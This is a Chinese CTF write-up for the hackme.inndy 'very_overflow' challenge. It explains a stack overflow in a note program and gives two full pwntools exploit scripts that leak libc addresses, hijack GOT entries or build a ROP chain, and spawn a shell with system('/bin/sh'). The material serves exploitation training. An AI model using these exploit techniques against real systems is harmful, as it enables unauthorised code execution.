×

very_overflow

96
D4rk3r
2018.09.16 02:41 字数 93
保护
add_note
edit_note

edit函数存在栈溢出,可以覆盖下一个note->next,从而泄漏libc,然后改strlen_got为system函数又或者更改返回地址然后rop到system('/bin/sh')

gef➤  x/10wx 0x0804A000
0x804a000:  0x08049f14  0xf7733918  0xf7724000  0xf759e590
0x804a010 <fgets@got.plt>:  0xf75b3070  0xf75b4b80  0x08048436  0xf75d33b0
0x804a020 <__libc_start_main@got.plt>:  0xf756d540  0xf75b5240

gef➤  x/10wx 0xf7724000
0xf7724000 <_dl_runtime_resolve>:   0x8b525150  0x8b102454  0xe80c2444  0xffff97d0
0xf7724010 <_dl_runtime_resolve+16>:    0x240c8b5a  0x8b240489  0xc2042444  0x9066000c

由于要满足

所以我们将note[2]->next改为0x804a004然后修改atoi表,由于修改了_dl_runtime_resolve所以需要爆破几次才能成功

exp1:

from pwn import *
#context.log_level = 'debug'

def pwn():
    p = process('./very_overflow',env = {"LD_PRELOAD":"../libc-2.23.so.i386"})
    #p = remote('hackme.inndy.tw',7705)
    elf = ELF('./very_overflow')

    def add(data):
        p.sendlineafter('action: ','1')
        p.sendlineafter('note: ',data)

    def edit(id,data):
        p.sendlineafter('action: ','2')
        p.sendlineafter('edit: ',str(id))
        p.sendlineafter('data: ',data)

    def show(id):
        p.sendlineafter('action: ','3')
        p.sendlineafter('show: ',str(id))

    def dump():
        p.sendlineafter('action: ','4')

    def exit():
        p.sendlineafter('action: ','5')

    add('aaa\x00')
    add('bbb\x00')
    add('ccc\x00')
    edit(1,'a'*4 + p32(elf.got['atoi']))
    
    #leak libc
    show(3)
    p.recvuntil('note: ')
    atoi_addr = int(p.recvuntil('\n',drop = True),16)
    offset_atoi = 0x0002d230
    offset_system = 0x0003ad80
    offset_printf = 0x00049590
    offset_puts = 0x0005fb80
    offset_fgets = 0x0005e070
    offset_strlen = 0x000754f0
    offset___libc_start_main = 0x00018540
    offset_setvbuf = 0x00060240
    offset_memset = 0x00076f30
    libc_base = atoi_addr - offset_atoi
    log.success('libc base addr : 0x%x'%libc_base)
    system_addr = libc_base + offset_system
    log.success('system addr : 0x%x'%system_addr)
    printf_addr = libc_base + offset_printf
    puts_addr = libc_base + offset_puts
    _dl_runtime_resolve = libc_base + 0x1cf001
    fgets_addr = libc_base + offset_fgets
    strlen_addr = libc_base + offset_strlen
    start_main = libc_base + offset___libc_start_main
    setvbuf_addr = libc_base + offset_setvbuf
    memset_addr = libc_base + offset_memset


    #hijack strlen_got --> system_addr
    edit(1,'a'*4 + p32(0x0804a004) )
    payload = p32(_dl_runtime_resolve) + p32(printf_addr)
    payload += p32(fgets_addr) + p32(puts_addr)
    payload += p32(elf.got['__gmon_start__']) 
    # payload += p32(strlen_addr) + p32(start_main)
    # payload += p32(setvbuf_addr) + p32(memset_addr)
    payload += p32(system_addr)
    add(payload)

    add('/bin/sh\x00')
    #print p.recv()
    p.interactive()
    p.close()

while True:
    try:
        pwn()
    except Exception as e:
        print e

exp2:

from pwn import *
context.log_level = 'debug'
p = process('./very_overflow',env = {"LD_PRELOAD":"../libc-2.23.so.i386"})
#p = remote('hackme.inndy.tw',7705)
elf = ELF('./very_overflow')

def add(data):
    p.sendlineafter('action: ','1')
    p.sendlineafter('note: ',data)

def edit(id,data):
    p.sendlineafter('action: ','2')
    p.sendlineafter('edit: ',str(id))
    p.sendlineafter('data: ',data)

def show(id):
    p.sendlineafter('action: ','3')
    p.sendlineafter('show: ',str(id))

def dump():
    p.sendlineafter('action: ','4')

def exit():
    p.sendlineafter('action: ','5')

#leak stack addr
add('aa')
show(0)
p.recvuntil('note: ')
stack_addr = int(p.recvuntil('\n',drop = True),16)
rop_addr = stack_addr + 0x4204
#gdb.attach(p)
edit(0,'bbbb' + p32(elf.got['puts']))
show(2)

#leak libc
p.recvuntil('note: ')
puts_addr = int(p.recvuntil('\n',drop = True),16)
offset_puts = 0x0005fb80
offset_system = 0x0003ad80
offset_str_bin_sh = 0x15ba3f
libc_base = puts_addr - offset_puts
log.success('libc base addr : 0x%x'%libc_base)
system_addr = libc_base + offset_system
binsh_addr = libc_base + offset_str_bin_sh
log.success('system addr : 0x%x'%system_addr)
log.success('binsh addr : 0x%x'%binsh_addr)


#rop system('/bin/sh')
edit(0,'bbbb' + p32(rop_addr))
payload = p32(system_addr) + 'bbbb' + p32(binsh_addr)
edit(2,payload)
exit()

p.interactive()
hackme.inndy_wp
Web note ad 1